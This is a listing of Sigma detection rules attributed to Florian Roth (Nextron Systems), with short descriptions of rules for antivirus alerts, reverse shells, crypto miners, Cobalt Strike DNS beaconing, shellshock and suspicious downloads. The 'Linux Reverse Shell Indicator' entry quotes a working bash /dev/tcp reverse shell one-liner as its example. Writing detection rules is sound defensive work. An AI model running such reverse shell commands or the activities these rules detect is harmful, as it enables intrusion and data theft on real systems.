Sigma Rules
638 rules found for "Florian Roth (Nextron Systems)"
Antivirus Exploitation Framework Detection
Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Antivirus Hacktool Detection
Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Antivirus Password Dumper Detection
Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Antivirus Ransomware Detection
Detects a highly relevant Antivirus alert that reports ransomware. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Antivirus Relevant File Paths Alerts
Detects an Antivirus alert in a highly relevant file path or with a relevant file name. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Antivirus Web Shell Detection
Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Possible Coin Miner CPU Priority Param
Detects command line parameter very often used with coin miners
Suspicious Commands Linux
Detects relevant commands often related to malware or hacking activity
Program Executions in Suspicious Folders
Detects program executions in suspicious non-program folders related to malware or hacking activity
Relevant ClamAV Message
Detects relevant ClamAV messages
Guacamole Two Users Sharing Session Anomaly
Detects suspicious session with two users present
Equation Group Indicators
Detects suspicious shell commands used in various Equation Group scripts and tools
Buffer Overflow Attempts
Detects buffer overflow attempts in Unix system log files
Shellshock Expression
Detects shellshock expressions in log files
Suspicious Activity in Shell Commands
Detects suspicious shell commands used in various exploit codes (see references)
Suspicious Log Entries
Detects suspicious log entries in Linux log files
Suspicious Reverse Shell Command Line
Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
JexBoss Command Sequence
Detects suspicious command sequence that JexBoss
Symlink Etc Passwd
Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd
Suspicious OpenSSH Daemon Error
Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
Suspicious Named Error
Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
Suspicious VSFTPD Error Messages
Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
Linux Reverse Shell Indicator
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
Linux Crypto Mining Pool Connections
Detects process connections to a Monero crypto mining pool
Communication To Ngrok Tunneling Service - Linux
Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
Linux Crypto Mining Indicators
Detects command line parameters or strings often used by crypto miners
Shell Execution via Rsync - Linux
Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Suspicious Invocation of Shell via Rsync
Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
History File Deletion
Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
Print History File Contents
Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
Interactive Bash Suspicious Children
Detects suspicious interactive bash as a parent to rather uncommon child processes
Linux Shell Pipe to Shell
Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
Access of Sudoers File Content
Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.
Linux Recon Indicators
Detects events with patterns found in commands used for reconnaissance on linux systems
Linux Webshell Indicators
Detects suspicious sub processes of web server processes
Credentials from Password Stores - Keychain
Detects passwords dumps from Keychain
DNS Query to External Service Interaction Domains
Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
Cobalt Strike DNS Beaconing
Detects suspicious DNS queries known from Cobalt Strike beacons
Monero Crypto Coin Mining Pool Lookup
Detects suspicious DNS queries to Monero mining pools
Suspicious DNS Query with B64 Encoded String
Detects suspicious DNS queries using base64 encoding
Telegram Bot API Request
Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind
Apache Segmentation Fault
Detects a segmentation fault error message caused by a crashing apache worker process
Apache Threading Error
Detects an issue in apache logs that reports threading related errors
Nginx Core Dump
Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.
Windows WebDAV User Agent
Detects WebDav DownloadCradle
Download from Suspicious Dyndns Hosts
Detects download of certain file types from hosts with dynamic DNS names (selected list)
Download From Suspicious TLD - Blacklist
Detects download of certain file types from hosts in suspicious TLDs
Download From Suspicious TLD - Whitelist
Detects executable downloads from suspicious remote systems